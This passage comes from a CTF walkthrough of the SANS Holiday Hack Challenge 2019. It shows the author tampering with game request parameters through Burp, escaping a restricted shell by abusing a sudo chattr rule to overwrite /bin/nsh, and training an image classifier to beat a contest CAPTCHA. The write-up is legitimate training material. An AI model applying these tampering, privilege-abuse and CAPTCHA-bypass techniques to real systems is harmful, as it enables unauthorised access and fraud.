&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;452&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trail-mix-cookie=f2a856a1e116d4c8e20dac88f31505dba60e7a17&lt;/span&gt;

pace=0&amp;amp;playerid=JebediahSpringfield&amp;amp;action=go&amp;amp;difficulty=2&amp;amp;money=1500&amp;amp;distance=0&amp;amp;curmonth=9&amp;amp;curday=1&amp;amp;name0=Emmanuel&amp;amp;health0=100&amp;amp;cond0=0&amp;amp;cause0=&amp;amp;deathday0=0&amp;amp;deathmonth0=0&amp;amp;name1=Lila&amp;amp;health1=100&amp;amp;cond1=0&amp;amp;cause1=&amp;amp;deathday1=0&amp;amp;deathmonth1=0&amp;amp;name2=Mathias&amp;amp;health2=100&amp;amp;cond2=0&amp;amp;cause2=&amp;amp;deathday2=0&amp;amp;deathmonth2=0&amp;amp;name3=Joseph&amp;amp;health3=100&amp;amp;cond3=0&amp;amp;cause3=&amp;amp;deathday3=0&amp;amp;deathmonth3=0&amp;amp;reindeer=2&amp;amp;runners=2&amp;amp;ammo=10&amp;amp;meds=2&amp;amp;food=100&amp;amp;hash=bc573864331a9e42e4511de6f678aa83
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, let's see what happens it we try to modify the &lt;code&gt;distance&lt;/code&gt; parameter:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/trail/&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trail.elfu.org&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;452&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trail-mix-cookie=f2a856a1e116d4c8e20dac88f31505dba60e7a17&lt;/span&gt;

pace=0&amp;amp;playerid=JebediahSpringfield&amp;amp;action=go&amp;amp;difficulty=2&amp;amp;money=1500&amp;amp;distance=8000&amp;amp;curmonth=9&amp;amp;curday=1&amp;amp;name0=Emmanuel&amp;amp;health0=100&amp;amp;cond0=0&amp;amp;cause0=&amp;amp;deathday0=0&amp;amp;deathmonth0=0&amp;amp;name1=Lila&amp;amp;health1=100&amp;amp;cond1=0&amp;amp;cause1=&amp;amp;deathday1=0&amp;amp;deathmonth1=0&amp;amp;name2=Mathias&amp;amp;health2=100&amp;amp;cond2=0&amp;amp;cause2=&amp;amp;deathday2=0&amp;amp;deathmonth2=0&amp;amp;name3=Joseph&amp;amp;health3=100&amp;amp;cond3=0&amp;amp;cause3=&amp;amp;deathday3=0&amp;amp;deathmonth3=0&amp;amp;reindeer=2&amp;amp;runners=2&amp;amp;ammo=10&amp;amp;meds=2&amp;amp;food=100&amp;amp;hash=bc573864331a9e42e4511de6f678aa83
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Sun, 12 Jan 2020 21:35:13 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;198&lt;/span&gt;
&lt;span class="na"&gt;Set-Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trail-mix-cookie=8dc362d86d212e4032987287943a7b0f1c569ef1; expires=Mon, 13 Jan 2020 00:35:13 GMT; HttpOnly; Max-Age=10800; Path=/&lt;/span&gt;

&lt;span class="hll"&gt;&amp;lt;html&amp;gt;&amp;lt;title&amp;gt;Fail&amp;lt;/title&amp;gt;&amp;lt;body style=&amp;#39;background-color:black;&amp;#39;&amp;gt;&amp;lt;font color=&amp;#39;white&amp;#39;&amp;gt;Sorry, something&amp;#39;s just not right about your status: badHash&amp;lt;br&amp;gt;You have fallen off the trail.&amp;amp;trade;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Well, we can't modify the parameters anymore, they are checked. Or, are they?
By trying to modify different parameters, we can see which ones are checked in
the hash parameter. For example, we can't modify the distance, or our money.
But the reindeers' health is not checked. So, we can modify their health, so
that our reindeers is always to the max. We can use Burp's match and replace
functionality to do so:&lt;/p&gt;
&lt;img alt="trail_burp_match_replace.png" class="align-center" src="/images/sans-christmas-challenge-2019/trail_burp_match_replace.png" /&gt;
&lt;p&gt;Now, we can set the pace to &amp;quot;Grueling&amp;quot;, and keep progressing, and travel the
whole distance:&lt;/p&gt;
&lt;img alt="trail_hard_distance_8000.png" class="align-center" src="/images/sans-christmas-challenge-2019/trail_hard_distance_8000.png" /&gt;
&lt;/div&gt;
&lt;div class="section" id="get-access-to-the-steam-tunnels"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id27"&gt;Get Access To The Steam Tunnels&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;When we get inside an elf's room, we see a weird looking guy running away:&lt;/p&gt;
&lt;img alt="dorm_krampus_running_away.gif" class="align-center" src="/images/sans-christmas-challenge-2019/dorm_krampus_running_away.gif" /&gt;
&lt;p&gt;We follow him into the closet, but we're face to a closed door, with a key ring
and a key hole. If we snoop around the room, we find a weird looking machine,
with six dials and a &amp;quot;Cut&amp;quot; button. Let's try something:&lt;/p&gt;
&lt;img alt="key_cutter.png" class="align-center" src="/images/sans-christmas-challenge-2019/key_cutter.png" /&gt;
&lt;p&gt;Alright! It's a key cutter. We can cut a key with different notch size.&lt;/p&gt;
&lt;img alt="001337.png" class="align-center" src="/images/sans-christmas-challenge-2019/001337.png" /&gt;
&lt;p&gt;If we manage to get a glimpse of the key opening the door in the closet, we can
cut a copy, and then open the door. But where can we see the key?&lt;/p&gt;
&lt;p&gt;Looking back at the guy that ran away, we can see that he has a key dangling
from his belt. But he's running away fast, how can we get a good look at the
key? Well, we can use our browser's developer tools, head over to the &amp;quot;Network&amp;quot;
tab, and see the image of our guy being downloaded:&lt;/p&gt;
&lt;img alt="browser_network_panel_krampus.png" class="align-center" src="/images/sans-christmas-challenge-2019/browser_network_panel_krampus.png" /&gt;
&lt;p&gt;Let's download our &lt;code&gt;krampus.png&lt;/code&gt;:&lt;/p&gt;
&lt;a class="reference external image-reference" href="/images/sans-christmas-challenge-2019/krampus.png"&gt;&lt;img alt="krampus.png" class="align-center" src="/images/sans-christmas-challenge-2019/small_krampus.png" /&gt;&lt;/a&gt;
&lt;p&gt;Now, we can open this image in our favorite image editor, and zoom in on the
key:&lt;/p&gt;
&lt;img alt="krampus_key_notches.png" class="align-center" src="/images/sans-christmas-challenge-2019/krampus_key_notches.png" /&gt;
&lt;p&gt;We can clearly see the six notches in this key. But how deep are they? We can
infer a couple of guesses:&lt;/p&gt;
&lt;img alt="krampus_key_notches_depth.png" class="align-center" src="/images/sans-christmas-challenge-2019/krampus_key_notches_depth.png" /&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;Notch #6 seems to be of depth zero. We can determine this by cutting trial
keys on the key cutter.&lt;/li&gt;
&lt;li&gt;Notch #1 seems to be one depth unit less than notch #2, but one depth unit
more than notch #6.&lt;/li&gt;
&lt;li&gt;Notches #2, 3, and 5, seem to be the same depth.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;So, we can then venture that:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Notch # 1 is depth 1&lt;/li&gt;
&lt;li&gt;Notches #2, 3, and 5 are depth 2&lt;/li&gt;
&lt;li&gt;Notch #6 is depth 0&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is still some uncertainty regarding notch #4. It seems to be three or
four depth unit more than notch #2, which would make it 5 or 6. We can generate
both keys and try them both. Turns out that the correct key is &lt;code&gt;122520&lt;/code&gt;:&lt;/p&gt;
&lt;img alt="122520.png" class="align-center" src="/images/sans-christmas-challenge-2019/122520.png" /&gt;
&lt;p&gt;We can now enter the steam tunnels, where we can find our runaway guy:&lt;/p&gt;
&lt;img alt="small_krampus.png" class="align-center" src="/images/sans-christmas-challenge-2019/small_krampus.png" /&gt;
&lt;p&gt;&lt;em&gt;Krampus says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hello there! I’m Krampus Hollyfeld.&lt;/p&gt;
&lt;p&gt;I maintain the steam tunnels underneath Elf U,&lt;/p&gt;
&lt;p&gt;Keeping all the elves warm and jolly.&lt;/p&gt;
&lt;p&gt;Though I spend my time in the tunnels and smoke,&lt;/p&gt;
&lt;p&gt;In this whole wide world, there's no happier bloke!&lt;/p&gt;
&lt;p&gt;Yes, I borrowed Santa’s turtle doves for just a bit.&lt;/p&gt;
&lt;p&gt;Someone left some scraps of paper near that fireplace, which is a big fire
hazard.&lt;/p&gt;
&lt;p&gt;I sent the turtle doves to fetch the paper scraps.&lt;/p&gt;
&lt;p&gt;But, before I can tell you more, I need to know that I can trust you.&lt;/p&gt;
&lt;p&gt;Tell you what – if you can help me beat the &lt;a class="reference external" href="https://fridosleigh.com/"&gt;Frido Sleigh&lt;/a&gt;
contest (Objective 8), then I'll know I can trust you.&lt;/p&gt;
&lt;p&gt;The contest is here on my screen and at &lt;a class="reference external" href="https://fridosleigh.com/"&gt;fridosleigh.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;No purchase necessary, enter as often as you want, so I am!&lt;/p&gt;
&lt;p&gt;They set up the rules, and lately, I have come to realize that I have certain materialistic, cookie needs.&lt;/p&gt;
&lt;p&gt;Unfortunately, it's restricted to elves only, and I can't bypass the CAPTEHA.&lt;/p&gt;
&lt;p&gt;(That's Completely Automated Public Turing test to tell Elves and Humans Apart.)&lt;/p&gt;
&lt;p&gt;I've already cataloged &lt;a class="reference external" href="https://downloads.elfu.org/capteha_images.tar.gz"&gt;12,000 images&lt;/a&gt;
and decoded the &lt;a class="reference external" href="/docs/sans-christmas-challenge-2019/capteha_api.py"&gt;API interface&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Can you help me bypass the CAPTEHA and submit lots of entries?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-8"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id28"&gt;Objective 8:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="alabaster-snowball-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id29"&gt;Alabaster Snowball's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Alabaster has a custom nyancat shell, but we're supposed to log into his
account and launch a regulard &lt;code&gt;bash&lt;/code&gt; prompt:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░&lt;/span&gt;
&lt;span class="go"&gt;░░░░░░░░░░▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄░░░░░░░░░&lt;/span&gt;
&lt;span class="go"&gt;░░░░░░░░▄▀░░░░░░░░░░░░▄░░░░░░░▀▄░░░░░░░&lt;/span&gt;
&lt;span class="go"&gt;░░░░░░░░█░░▄░░░░▄░░░░░░░░░░░░░░█░░░░░░░&lt;/span&gt;
&lt;span class="go"&gt;░░░░░░░░█░░░░░░░░░░░░▄█▄▄░░▄░░░█░▄▄▄░░░&lt;/span&gt;
&lt;span class="go"&gt;░▄▄▄▄▄░░█░░░░░░▀░░░░▀█░░▀▄░░░░░█▀▀░██░░&lt;/span&gt;
&lt;span class="go"&gt;░██▄▀██▄█░░░▄░░░░░░░██░░░░▀▀▀▀▀░░░░██░░&lt;/span&gt;
&lt;span class="go"&gt;░░▀██▄▀██░░░░░░░░▀░██▀░░░░░░░░░░░░░▀██░&lt;/span&gt;
&lt;span class="go"&gt;░░░░▀████░▀░░░░▄░░░██░░░▄█░░░░▄░▄█░░██░&lt;/span&gt;
&lt;span class="go"&gt;░░░░░░░▀█░░░░▄░░░░░██░░░░▄░░░▄░░▄░░░██░&lt;/span&gt;
&lt;span class="go"&gt;░░░░░░░▄█▄░░░░░░░░░░░▀▄░░▀▀▀▀▀▀▀▀░░▄▀░░&lt;/span&gt;
&lt;span class="go"&gt;░░░░░░█▀▀█████████▀▀▀▀████████████▀░░░░&lt;/span&gt;
&lt;span class="go"&gt;░░░░░░████▀░░███▀░░░░░░▀███░░▀██▀░░░░░░&lt;/span&gt;
&lt;span class="go"&gt;░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░&lt;/span&gt;

&lt;span class="go"&gt;nyancat, nyancat&lt;/span&gt;
&lt;span class="go"&gt;I love that nyancat!&lt;/span&gt;
&lt;span class="go"&gt;My shell&amp;#39;s stuffed inside one&lt;/span&gt;
&lt;span class="go"&gt;Whatcha&amp;#39; think about that?&lt;/span&gt;

&lt;span class="go"&gt;Sadly now, the day&amp;#39;s gone&lt;/span&gt;
&lt;span class="go"&gt;Things to do!  Without one...&lt;/span&gt;
&lt;span class="go"&gt;I&amp;#39;ll miss that nyancat&lt;/span&gt;
&lt;span class="go"&gt;Run commands, win, and done!&lt;/span&gt;

&lt;span class="go"&gt;Log in as the user alabaster_snowball with a password of Password2, and land in a Bash prompt.&lt;/span&gt;

&lt;span class="go"&gt;Target Credentials:&lt;/span&gt;

&lt;span class="go"&gt;username: alabaster_snowball&lt;/span&gt;
&lt;span class="go"&gt;password: Password2&lt;/span&gt;
&lt;span class="gp"&gt;elf@af7e11560ac9:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We're given his credentials. Let's use the regular way to switch user context
with the &lt;code&gt;su&lt;/code&gt; binary:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@af7e11560ac9:~$&lt;/span&gt; su alabaster_snowball
&lt;span class="go"&gt;Password:&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Aaaaand of course we're greeted by the nyancat.&lt;/p&gt;
&lt;img alt="nyanshell.png" class="align-center" src="/images/sans-christmas-challenge-2019/nyanshell.png" /&gt;
&lt;p&gt;Alright, let's take a look at Alabaster's shell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@af7e11560ac9:~$&lt;/span&gt; grep alabaster_snowball /etc/passwd
&lt;span class="go"&gt;alabaster_snowball:x:1001:1001::/home/alabaster_snowball:/bin/nsh&lt;/span&gt;
&lt;span class="gp"&gt;elf@af7e11560ac9:~$&lt;/span&gt; ls -lh /bin/nsh
&lt;span class="go"&gt;-rwxrwxrwx 1 root root 74K Dec 11 17:40 /bin/nsh&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So Alabaster's shell is &lt;code&gt;/bin/nsh&lt;/code&gt;. The binary appears to be writeable by
anyone. So if we replace &lt;code&gt;/bin/nsh&lt;/code&gt; by another binary,
say &lt;code&gt;/bin/bash&lt;/code&gt;, we can drop into the correct prompt:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@af7e11560ac9:~$&lt;/span&gt; cp /bin/bash /bin/nsh
&lt;span class="go"&gt;cp: cannot create regular file &amp;#39;/bin/nsh&amp;#39;: Operation not permitted&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, it didn't work. Even if the file is &lt;code&gt;chmod 777&lt;/code&gt;, we can't modify it.
This looks like its &lt;a class="reference external" href="https://wiki.archlinux.org/index.php/File_permissions_and_attributes#File_attributes"&gt;attributes&lt;/a&gt;
were modified:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@af7e11560ac9:~$&lt;/span&gt; lsattr /bin/nsh
&lt;span class="go"&gt;----i---------e---- /bin/nsh&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Indeed, the &lt;code&gt;i&lt;/code&gt; flag means that the file is &lt;strong&gt;immutable&lt;/strong&gt;. As the
&lt;code&gt;elf&lt;/code&gt; user, we can't modify &lt;code&gt;/bin/nsh&lt;/code&gt;'s attributes, because it
belongs to &lt;code&gt;root&lt;/code&gt;. Can we execute command as &lt;code&gt;root&lt;/code&gt;? Let's take a
look at our &lt;code&gt;sudo&lt;/code&gt; abilities:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@af7e11560ac9:~$&lt;/span&gt; sudo -l
&lt;span class="go"&gt;Matching Defaults entries for elf on af7e11560ac9:&lt;/span&gt;
&lt;span class="go"&gt;    env_reset, mail_badpass,&lt;/span&gt;
&lt;span class="go"&gt;    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin&lt;/span&gt;

&lt;span class="go"&gt;User elf may run the following commands on af7e11560ac9:&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;    (root) NOPASSWD: /usr/bin/chattr&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Yes, we can run &lt;code&gt;chattr&lt;/code&gt;, which allows us to remove the immutable file
from &lt;code&gt;/bin/nsh&lt;/code&gt;, and then modify its content:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@af7e11560ac9:~$&lt;/span&gt; sudo chattr -i /bin/nsh
&lt;span class="gp"&gt;elf@af7e11560ac9:~$&lt;/span&gt; lsattr /bin/nsh
&lt;span class="go"&gt;--------------e---- /bin/nsh&lt;/span&gt;
&lt;span class="gp"&gt;elf@af7e11560ac9:~$&lt;/span&gt; cp /bin/bash /bin/nsh
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can now log into Alabaster's account, which will drop us into a &lt;code&gt;bash&lt;/code&gt;
prompt:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@af7e11560ac9:~$&lt;/span&gt; su alabaster_snowball
&lt;span class="go"&gt;Password:&lt;/span&gt;
&lt;span class="go"&gt;Loading, please wait......&lt;/span&gt;



&lt;span class="go"&gt;You did it! Congratulations!&lt;/span&gt;

&lt;span class="gp"&gt;alabaster_snowball@af7e11560ac9:/home/elf$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="bypassing-the-frido-sleigh-capteha"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id30"&gt;Bypassing the Frido Sleigh CAPTEHA&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;So, Krampus wants us to help him win the &lt;a class="reference external" href="https://fridosleigh.com/"&gt;Frido Sleigh&lt;/a&gt;
contest. But to do so, we need to bypass the &lt;a class="reference external" href="https://en.wikipedia.org/wiki/CAPTCHA"&gt;CAPTEHA&lt;/a&gt;,
or &amp;quot;Completely Automated Public Turing test to tell Elves and Humans Apart&amp;quot;.
You see, only elves can enter the contest.&lt;/p&gt;
&lt;img alt="capteha_fail.gif" class="align-center" src="/images/sans-christmas-challenge-2019/capteha_fail.gif" /&gt;
&lt;p&gt;As you can see, the CAPTEHA is pretty hard. We're given 100 images, and we have
five seconds to select every image from three categories. Feasible for an elf,
but not a human.&lt;/p&gt;
&lt;p&gt;Luckily, Krampus gave us an archive of &lt;a class="reference external" href="https://downloads.elfu.org/capteha_images.tar.gz"&gt;12,000 images&lt;/a&gt;
that are properly categorized, and a &lt;a class="reference external" href="/docs/sans-christmas-challenge-2019/capteha_api.py"&gt;Python script&lt;/a&gt;
to interact with the website API. We can use these images to create a Machine
Learning model, so that our Python script can answer the CAPTEHA in our place.&lt;/p&gt;
&lt;p&gt;Now, I don't know anything about Machine Learning. Luckily, there's a
&lt;a class="reference external" href="https://www.youtube.com/watch?v=jmVPLwjm_zs"&gt;conference on the subject&lt;/a&gt;
right here at KringleCon! Be sure to give it a look, it's pretty interesting.&lt;/p&gt;
&lt;p&gt;As Chris suggests in his talk, I'm going to use &lt;a class="reference external" href="https://www.tensorflow.org/"&gt;TensorFlow&lt;/a&gt;
to create a model to solve our CAPTEHA. I was first going to use the &lt;a class="reference external" href="https://github.com/tensorflow/hub/tree/master/examples/image_retraining"&gt;retrain.py&lt;/a&gt;
mentioned in the talk, however, it seems to have been deprecated in favor of
&lt;a class="reference external" href="https://github.com/tensorflow/hub/tree/master/tensorflow_hub/tools/make_image_classifier"&gt;make_image_classifier&lt;/a&gt;.
So let's use this script instead:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; make_image_classifier --image_dir ./capteha_images --tfhub_module https://tfhub.dev/google/tf2-preview/mobilenet_v2/feature_vector/4 --saved_model_dir capteha_model --labels_output_file capteha_labels.txt --tflite_output_file capteha_lite_model --batch_size &lt;span class="m"&gt;16&lt;/span&gt;
&lt;span class="go"&gt;I1231 13:03:54.815997 140094772307776 resolver.py:79] Using /tmp/tfhub_modules to cache modules.&lt;/span&gt;
&lt;span class="go"&gt;2019-12-31 13:03:55.051043: I tensorflow/core/platform/cpu_feature_guard.cc:142] Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX2 FMA&lt;/span&gt;
&lt;span class="go"&gt;2019-12-31 13:03:55.086432: I tensorflow/core/platform/profile_utils/cpu_utils.cc:94] CPU Frequency: 1992000000 Hz&lt;/span&gt;
&lt;span class="go"&gt;2019-12-31 13:03:55.088571: I tensorflow/compiler/xla/service/service.cc:168] XLA service 0x446a880 executing computations on platform Host. Devices:&lt;/span&gt;
&lt;span class="go"&gt;2019-12-31 13:03:55.088742: I tensorflow/compiler/xla/service/service.cc:175]   StreamExecutor device (0): Host, Default Version&lt;/span&gt;
&lt;span class="go"&gt;Using module https://tfhub.dev/google/tf2-preview/mobilenet_v2/feature_vector/4 with image size (224, 224)&lt;/span&gt;
&lt;span class="go"&gt;Found 2394 images belonging to 6 classes.&lt;/span&gt;
&lt;span class="go"&gt;Found 9582 images belonging to 6 classes.&lt;/span&gt;
&lt;span class="go"&gt;Found 6 classes: Candy Canes, Christmas Trees, Ornaments, Presents, Santa Hats, Stockings&lt;/span&gt;
&lt;span class="go"&gt;Model: &amp;quot;sequential&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;_________________________________________________________________&lt;/span&gt;
&lt;span class="go"&gt;Layer (type)                 Output Shape              Param #&lt;/span&gt;
&lt;span class="go"&gt;=================================================================&lt;/span&gt;
&lt;span class="go"&gt;keras_layer (KerasLayer)     multiple                  2257984&lt;/span&gt;
&lt;span class="go"&gt;_________________________________________________________________&lt;/span&gt;
&lt;span class="go"&gt;dropout (Dropout)            multiple                  0&lt;/span&gt;
&lt;span class="go"&gt;_________________________________________________________________&lt;/span&gt;
&lt;span class="go"&gt;dense (Dense)                multiple                  7686&lt;/span&gt;
&lt;span class="go"&gt;=================================================================&lt;/span&gt;
&lt;span class="go"&gt;Total params: 2,265,670&lt;/span&gt;
&lt;span class="go"&gt;Trainable params: 7,686&lt;/span&gt;
&lt;span class="go"&gt;Non-trainable params: 2,257,984&lt;/span&gt;
&lt;span class="go"&gt;_________________________________________________________________&lt;/span&gt;
&lt;span class="go"&gt;None&lt;/span&gt;
&lt;span class="go"&gt;Epoch 1/5&lt;/span&gt;
&lt;span class="go"&gt;598/598 [==============================] - 1073s 2s/step - loss: 0.5153 - accuracy: 0.9392 - val_loss: 0.4479 - val_accuracy: 0.9996&lt;/span&gt;
&lt;span class="go"&gt;Epoch 2/5&lt;/span&gt;
&lt;span class="go"&gt;598/598 [==============================] - 1071s 2s/step - loss: 0.4573 - accuracy: 0.9995 - val_loss: 0.4402 - val_accuracy: 0.9996&lt;/span&gt;
&lt;span class="go"&gt;Epoch 3/5&lt;/span&gt;
&lt;span class="go"&gt;598/598 [==============================] - 1075s 2s/step - loss: 0.4487 - accuracy: 1.0000 - val_loss: 0.4376 - val_accuracy: 0.9996&lt;/span&gt;
&lt;span class="go"&gt;Epoch 4/5&lt;/span&gt;
&lt;span class="go"&gt;598/598 [==============================] - 1076s 2s/step - loss: 0.4450 - accuracy: 1.0000 - val_loss: 0.4354 - val_accuracy: 0.9996&lt;/span&gt;
&lt;span class="go"&gt;Epoch 5/5&lt;/span&gt;
&lt;span class="go"&gt;598/598 [==============================] - 1081s 2s/step - loss: 0.4423 - accuracy: 1.0000 - val_loss: 0.4343 - val_accuracy: 0.9996&lt;/span&gt;
&lt;span class="go"&gt;Done with training.&lt;/span&gt;
&lt;span class="go"&gt;Labels written to capteha_labels.txt&lt;/span&gt;
&lt;span class="go"&gt;2019-12-31 14:33:36.474227: W tensorflow/python/util/util.cc:299] Sets are not currently considered sequences, but this may change in the future, so consider avoiding using them.&lt;/span&gt;
&lt;span class="go"&gt;WARNING:tensorflow:From /home/user/venv/tensorflow/lib/python3.6/site-packages/tensorflow_core/python/ops/resource_variable_ops.py:1781: calling BaseResourceVariable.__init__ (from tensorflow.python.ops.resource_variable_ops) with constraint is deprecated and will be removed in a future version.&lt;/span&gt;
&lt;span class="go"&gt;Instructions for updating:&lt;/span&gt;
&lt;span class="go"&gt;If using Keras pass *_constraint arguments to layers.&lt;/span&gt;
&lt;span class="go"&gt;W1231 14:33:37.121725 140094772307776 deprecation.py:506] From /home/user/venv/tensorflow/lib/python3.6/site-packages/tensorflow_core/python/ops/resource_variable_ops.py:1781: calling BaseResourceVariable.__init__ (from tensorflow.python.ops.resource_variable_ops) with constraint is deprecated and will be removed in a future version.&lt;/span&gt;
&lt;span class="go"&gt;Instructions for updating:&lt;/span&gt;
&lt;span class="go"&gt;If using Keras pass *_constraint arguments to layers.&lt;/span&gt;
&lt;span class="go"&gt;INFO:tensorflow:Assets written to: capteha_model/assets&lt;/span&gt;
&lt;span class="go"&gt;I1231 14:33:38.405297 140094772307776 builder_impl.py:771] Assets written to: capteha_model/assets&lt;/span&gt;
&lt;span class="go"&gt;SavedModel model exported to capteha_model&lt;/span&gt;
&lt;span class="go"&gt;2019-12-31 14:33:39.668104: W tensorflow/core/graph/graph_constructor.cc:761] Node &amp;#39;StatefulPartitionedCall&amp;#39; has 71 outputs but the _output_shapes attribute specifies shapes for 605 outputs. Output shapes may be inaccurate.&lt;/span&gt;
&lt;span class="go"&gt;2019-12-31 14:33:41.580706: I tensorflow/core/grappler/devices.cc:60] Number of eligible GPUs (core count &amp;gt;= 8, compute capability &amp;gt;= 0.0): 0 (Note: TensorFlow was not compiled with CUDA support)&lt;/span&gt;
&lt;span class="go"&gt;2019-12-31 14:33:41.580786: I tensorflow/core/grappler/clusters/single_machine.cc:356] Starting new session&lt;/span&gt;
&lt;span class="go"&gt;2019-12-31 14:33:41.672872: I tensorflow/core/grappler/optimizers/meta_optimizer.cc:716] Optimization results for grappler item: graph_to_optimize&lt;/span&gt;
&lt;span class="go"&gt;2019-12-31 14:33:41.672907: I tensorflow/core/grappler/optimizers/meta_optimizer.cc:718]   function_optimizer: Graph size after: 1905 nodes (1640), 3234 edges (2969), time = 43.177ms.&lt;/span&gt;
&lt;span class="go"&gt;2019-12-31 14:33:41.672913: I tensorflow/core/grappler/optimizers/meta_optimizer.cc:718]   function_optimizer: function_optimizer did nothing. time = 0.76ms.&lt;/span&gt;
&lt;span class="go"&gt;2019-12-31 14:33:42.822924: I tensorflow/core/grappler/devices.cc:60] Number of eligible GPUs (core count &amp;gt;= 8, compute capability &amp;gt;= 0.0): 0 (Note: TensorFlow was not compiled with CUDA support)&lt;/span&gt;
&lt;span class="go"&gt;2019-12-31 14:33:42.823025: I tensorflow/core/grappler/clusters/single_machine.cc:356] Starting new session&lt;/span&gt;
